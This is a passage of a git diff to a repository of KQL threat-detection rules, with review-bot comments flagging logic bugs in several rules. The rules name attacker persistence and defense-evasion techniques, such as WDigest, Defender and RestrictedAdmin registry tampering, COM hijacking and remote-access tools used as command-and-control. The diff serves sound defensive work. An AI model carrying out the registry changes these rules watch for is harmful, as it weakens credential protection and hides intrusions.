 | where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
index 41a02e7d..3b97c86d 100644
--- a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
+++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
@@ -1,13 +1,13 @@
-// Title: Register New IFiltre For Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: medium
-// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
-// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate registration of IFilters by the OS or software
-
-DeviceRegistryEvents
+// Title: Register New IFiltre For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
+// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate registration of IFilters by the OS or software
+
+DeviceRegistryEvents
 | where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." 
and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith 
"\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/Persistence/registry_explorer_policy_modification.kql index a14b0226..cf0c28fe 100644 --- a/KQL/rules/Persistence/registry_explorer_policy_modification.kql +++ b/KQL/rules/Persistence/registry_explorer_policy_modification.kql 
@@ -1,12 +1,12 @@
-// Title: Registry Explorer Policy Modification
-// Author: frack113
-// Date: 2022-03-18
-// Level: medium
-// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate admin script
-
-DeviceRegistryEvents
+// Title: Registry Explorer Policy Modification
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
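Review bot: The `RegistryValueData =~ "DWORD (0x00000001)"` predicate at the start of the `| where` line compares against Sysmon's rendering of a DWORD, but as far as I know Defender's DeviceRegistryEvents exposes DWORD data as a plain decimal string (e.g. `"1"`, with the type in RegistryValueType), so this rule would never fire on MDE data; please verify against a sample event from your tenant. If that holds, the value match should become something like `RegistryValueData == "1"` (and `"0"`/`"2"` where the other rules use those), ideally fixed in the converter's value mapping rather than by hand. The same `DWORD (0x...)` literal appears in the registry_hide_function_from_user and registry_modification_to_hidden_file_extension hunks below, and the key `endswith` checks compare against the value name at the end of the key path, which depends on how the generator joins key and value name, so that is worth confirming at the same time.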
diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/Persistence/registry_hide_function_from_user.kql
index 0820c432..085d597f 100644
--- a/KQL/rules/Persistence/registry_hide_function_from_user.kql
+++ b/KQL/rules/Persistence/registry_hide_function_from_user.kql
@@ -1,12 +1,12 @@
-// Title: Registry Hide Function from User
-// Author: frack113
-// Date: 2022-03-18
-// Level: medium
-// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate admin script
-
-DeviceRegistryEvents
+// Title: Registry Hide Function from User
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
index 9acd1ea3..6aed05d1 100644
--- a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
+++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
@@ -1,14 +1,14 @@
-// Title: Registry Manipulation via WMI Stdregprov
-// Author: Daniel Koifman (KoifSec)
-// Date: 2025-07-30
-// Level: medium
-// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.
-// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
-// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012
-// False Positives:
-// - Legitimate administrative activity
-
-DeviceProcessEvents
+// Title: Registry Manipulation via WMI Stdregprov
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.
+// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
+// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
index ba5213dd..87dfa661 100644
--- a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
+++ b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
@@ -1,12 +1,12 @@
-// Title: Registry Modification to Hidden File Extension
-// Author: frack113
-// Date: 2022-01-22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137
-// False Positives:
-// - Administrative scripts
-
-DeviceRegistryEvents
+// Title: Registry Modification to Hidden File Extension
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative scripts
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql
index b53b13d4..eaafc645 100644
--- a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql
+++ b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql
@@ -1,12 +1,12 @@
-// Title: Registry Modification Via Regini.EXE
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020-10-08
-// Level: low
-// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion
-// False Positives:
-// - Legitimate modification of keys
-
-DeviceProcessEvents
+// Title: Registry Modification Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate modification of keys
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
index 63172d2a..a330e552 100644
--- a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
+++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - AnyDesk Incoming Connection
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2024-09-02
-// Level: medium
-// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).
-
-DeviceNetworkEvents
+// Title: Remote Access Tool - AnyDesk Incoming Connection
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-09-02
+// Level: medium
+// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
index 487322ea..5a3e8d1e 100644
--- a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
+++ b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
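Review bot: The `| where` line only keeps the process-name condition, so the "incoming" part of the title is not enforced: every DeviceNetworkEvents row initiated by AnyDesk.exe or AnyDeskMSI.exe, including ordinary outbound sessions, will match and the rule becomes a plain "AnyDesk had network activity" alert. The original logic evidently restricted this to inbound connections (the false-positive note talks about expecting outgoing ones), so if the converter dropped a direction or initiated-flag field, a constraint such as `and ActionType == "InboundConnectionAccepted"` is needed to restore the intent; please check what the upstream rule keyed on before picking the exact field.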
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - ScreenConnect Installation Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-02-11
-// Level: medium
-// Description: Detects ScreenConnect program starts that establish a remote access to a system.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-// False Positives:
-// - Legitimate use by administrative staff
-
-DeviceProcessEvents
+// Title: Remote Access Tool - ScreenConnect Installation Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: medium
+// Description: Detects ScreenConnect program starts that establish a remote access to a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate use by administrative staff
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
index 824167a2..23ff74bf 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - Team Viewer Session Started On Linux Host
-// Author: Josh Nickels, Qi Nan
-// Date: 2024-03-11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-// False Positives:
-// - Legitimate usage of TeamViewer
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Team Viewer Session Started On Linux Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
index 09ce1d7b..4064ad86 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host
-// Author: Josh Nickels, Qi Nan
-// Date: 2024-03-11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-// False Positives:
-// - Legitimate usage of TeamViewer
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
index 9e3f57aa..d3f23e31 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - Team Viewer Session Started On Windows Host
-// Author: Josh Nickels, Qi Nan
-// Date: 2024-03-11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1133
-// False Positives:
-// - Legitimate usage of TeamViewer
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Team Viewer Session Started On Windows Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
index 05e6c37f..78e93068 100644
--- a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
+++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
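Review bot: The two `=~` comparisons on the last line test the full image path against a bare file name, so on DeviceProcessEvents, where FolderPath carries the complete path, `FolderPath =~ "TeamViewer_Desktop.exe"` and `InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"` can never be true and the rule stays silent. The Linux and macOS variants in the two preceding hunks use `endswith` and do not have this problem. Suggested: `and FolderPath endswith "\\TeamViewer_Desktop.exe" and InitiatingProcessFolderPath endswith "\\TeamViewer_Service.exe"`, or compare FileName and InitiatingProcessFileName with `=~` instead.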
@@ -1,13 +1,13 @@
-// Title: Removal of Potential COM Hijacking Registry Keys
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
-// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered
-
-DeviceRegistryEvents
+// Title: Removal of Potential COM Hijacking Registry Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
+// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
index fafaffef..e75d715f 100644
--- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
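Review bot: The query carries no ActionType restriction, so despite the title it matches every registry event on a `\shell\open\command` key rather than deletions only; a filter such as `| where ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")` belongs before the path match. Two of the carried-over exclusions are also inert as written: the Avira `in~` compares a full process path against directory prefixes ending in `\` (which only `startswith` can match), and `RegistryKey endswith "\\wireshark-capture-file*"` treats the trailing `*` as a literal character, not a wildcard. The remaining exclusions are unchanged by the commit and are not affected.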
@@ -1,12 +1,12 @@
-// Title: RestrictedAdminMode Registry Value Tampering
-// Author: frack113
-// Date: 2023-01-13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: RestrictedAdminMode Registry Value Tampering
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
index aa1efd7c..a8632c16 100644
--- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
